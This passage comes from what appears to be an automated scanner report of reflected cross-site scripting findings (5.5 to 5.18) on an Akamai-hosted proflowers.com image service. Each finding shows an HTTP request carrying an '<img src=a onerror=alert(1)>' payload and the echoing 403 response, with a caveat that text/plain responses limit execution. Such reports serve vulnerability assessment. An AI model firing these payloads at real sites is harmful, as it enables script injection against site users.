Date: Sun, 04 Sep 2011 01:06:13 GMT
Connection: close

Unable to find /ProvideCommerce/P007188130b2f<img src=a onerror=alert(1)>5d12361a7b4

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload b573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84 was submitted in REST URL parameter 9 and was echoed as b573e<img src=a onerror=alert(1)>554311b6c84 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727bb573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:02 GMT
Connection: close

Unable to find /ProvideCommerce/P0073727bb573e<img src=a onerror=alert(1)>554311b6c84

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077 was submitted in REST URL parameter 9 and was echoed as 1047c<img src=a onerror=alert(1)>2e316f78077 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:41 GMT
Connection: close

Unable to find /ProvideCommerce/P0090481b1047c<img src=a onerror=alert(1)>2e316f78077

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3 was submitted in REST URL parameter 9 and was echoed as 7c462<img src=a onerror=alert(1)>76984cbffb3 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:19 GMT
Connection: close

Unable to find /ProvideCommerce/P0105447b7c462<img src=a onerror=alert(1)>76984cbffb3

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload b1157<img%20src%3da%20onerror%3dalert(1)>920787cad49 was submitted in REST URL parameter 9 and was echoed as b1157<img src=a onerror=alert(1)>920787cad49 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684bb1157<img%20src%3da%20onerror%3dalert(1)>920787cad49?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:58 GMT
Connection: close

Unable to find /ProvideCommerce/P0105684bb1157<img src=a onerror=alert(1)>920787cad49

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315 was submitted in REST URL parameter 9 and was echoed as 966ec<img src=a onerror=alert(1)>cb6928d315 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:16 GMT
Connection: close

Unable to find /ProvideCommerce/P0106998b966ec<img src=a onerror=alert(1)>cb6928d315

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 8719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c was submitted in REST URL parameter 9 and was echoed as 8719d<img src=a onerror=alert(1)>48d0d519a3c in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W18719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:05 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000001016X_35172_W18719d<img src=a onerror=alert(1)>48d0d519a3c

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0 was submitted in REST URL parameter 9 and was echoed as 5ad2c<img src=a onerror=alert(1)>a2783a548b0 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:24 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img src=a onerror=alert(1)>a2783a548b0

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708 was submitted in REST URL parameter 9 and was echoed as 90233<img src=a onerror=alert(1)>4af1509f708 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:17 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ90233<img src=a onerror=alert(1)>4af1509f708

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload dde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13 was submitted in REST URL parameter 9 and was echoed as dde05<img src=a onerror=alert(1)>7b7dbc8df13 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img%20src%3da%20onerror%3dalert(1)>7b7dbc8df13?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:00 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007H355_69865_W2_SQdde05<img src=a onerror=alert(1)>7b7dbc8df13

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload b5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe was submitted in REST URL parameter 9 and was echoed as b5852<img src=a onerror=alert(1)>e0c47f2adfe in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img%20src%3da%20onerror%3dalert(1)>e0c47f2adfe?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:38 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H201_82170_W2_SQb5852<img src=a onerror=alert(1)>e0c47f2adfe

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516 was submitted in REST URL parameter 9 and was echoed as 5dc38<img src=a onerror=alert(1)>73585b63516 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img%20src%3da%20onerror%3dalert(1)>73585b63516?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008H203_82172_W1_SQ5dc38<img src=a onerror=alert(1)>73585b63516

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af was submitted in REST URL parameter 9 and was echoed as fd9b1<img src=a onerror=alert(1)>c9ece6814af in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img%20src%3da%20onerror%3dalert(1)>c9ece6814af?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1fd9b1<img src=a onerror=alert(1)>c9ece6814af

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload bf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f was submitted in REST URL parameter 9 and was echoed as bf8d3<img src=a onerror=alert(1)>4c20501340f in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img%20src%3da%20onerror%3dalert(1)>4c20501340f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000008G370X_85066_W7_SQbf8d3<img src=a onerror=alert(1)>4c20501340f

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload dc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3 was submitted in REST URL parameter 9 and was echoed as dc8f1<img src=a onerror=alert(1)>351d0d588f3 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img%20src%3da%20onerror%3dalert(1)>351d0d588f3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
